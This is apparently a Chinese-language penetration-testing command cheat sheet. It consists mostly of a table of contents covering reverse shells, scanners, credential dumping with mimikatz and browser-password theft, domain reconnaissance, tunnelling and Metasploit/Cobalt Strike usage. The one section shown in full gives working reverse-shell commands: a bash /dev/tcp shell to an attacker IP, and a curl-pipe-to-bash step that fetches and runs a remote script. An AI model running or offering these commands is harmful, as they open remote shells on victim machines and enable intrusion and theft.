攻防渗透常用命令速查
建议配合CTRL+F
进行查询
目录
- 攻防渗透常用命令速查
- 目录
- 反弹Shell
- bash
- curl
- http
- java
- ssh无记录shell
- python交互shell
- 图片马制作
- 按首字母排序
- AlliN
- Arjun
- dirsearch
- dirmap
- EHole
- ENScan_GO
- find
- ffuf
- fscan
- grep
- hping3
- hydra
- JNDI
- HackBrowerserData
- kscan
- ksubdomain
- mysql
- medusa
- nmap
- OneForAll
- scaninfo
- sqlmap
- TideFinger
- URLFinder
- Vulmap
- Xray
- 数据库连接
- Redis
- Postgresql
- 内网信息收集
- 重要端口及服务
- Windows信息收集
- 查找文件 find/findstr
- 设置活动代码页编号 chcp
- 查看系统信息 systeminfo
- 查看环境变量 set
- 查看网络配置信息 ipconfig
- 查看当前用户信息 whoami
- 查看路由表 route
- 查看arp缓存表 arp
- 查看用户信息 net user/localgroup
- 查看主机开启时间 net statistics
- 查看安装软件及版本信息 wmic product
- 利用PowerShell收集软件版本信息
- 查看本机服务信息 wmic service
- 查看补丁信息 wmic qfe
- metasploit enum_patches
- windows exploit suggester
- 查看共享列表 wmic share
- 查看进程列表 tasklist
- 查看计划任务 schtasks
- 查看端口信息 netstat
- 查看防火墙配置 netsh
- 查看wifi信息
- 查看网络代理信息
- 查看PPTP配置信息
- 查看RDP远程桌面信息
- 查看数据库密码
- 查看服务信息 sc query
- 导出注册表信息 reg
- 导出日志信息
- 查看hosts文件
- 查看中间件信息
- 查看组策略 gpresult
- 查看启动项
- 抓取密码 mimikatz
- 浏览器密码
- 查看回收站
- 查看域信息 nltest/net
- Linux信息收集
- 操作系统基本信息
- 系统环境信息
- 系统服务信息
- 系统软件信息
- 系统任务和作业
- 用户信息和组信息
- 用户和权限信息
- 系统网络和路由信息
- 获取其他信息
- 域内信息收集
- 判断是否存在域
- ipconfig
- 查看系统详细信息 systeminfo
- 查看当前登录域与域用户 netconfig
- 判断主域 net time
- 收集域内基础信息
- 查看域 net view
- 查看域内计算机 net view
- 查看域内用户组列表 net group
- 查看域管理员列表 net group
- 查看企业管理员列表 net group
- 查看域内置administrator组用户
- 查看域密码策略信息 net accounts
- 查看域信任信息 nltest
- 收集域用户和管理员信息
- 查询域用户列表 net user
- 查询域用户详细信息 wmic useraccount
- 查询存在的用户
- 收集域控制器信息
- 查看域控主机名
- 查看域控制器列表 net group
- 查找域管理员进程
- 获取域管理员列表
- 列出本机的所有进程及进程用户
- 定位域管理员
- psloggedon查询
- netview查询
- 判断是否存在域
- 内网穿透代理
- Neo-reGeorg
- ssh
- nps
- frp
- 内网权限提升
- Windows系统提权
- Linux系统提权
- 内网渗透工具
- CobaltStrike
- Metasploit
- msfconsole辅助模块(Auxiliary)
- msfconsole后渗透攻击模块 (Post)
- msfconsole渗透攻击模块(Exploit)
- msfenvom生成shell code
- msfenvom生成可执行文件
- Meterpreter常用命令
- 各种shell的相互转换
- msf派生shell给cobalt Strike
- cobalt Strike联动msf
- command shell转meterpreter
- meterpreter转command shell
- 内网其他命令
- 3389端口开放
- powershell文件下载
反弹Shell
常用反弹shell方式如下(bash/curl/http),其他反弹shell方式参考:Click Here
bash
bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
curl
攻击方:
cat bash.html
/bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
被控端:
curl 192.168.35.152/bash.html|bash
http
攻击方:
# 编写shell脚本并启动http服务器
echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.sh
python2环境下:python -m SimpleHTTPServer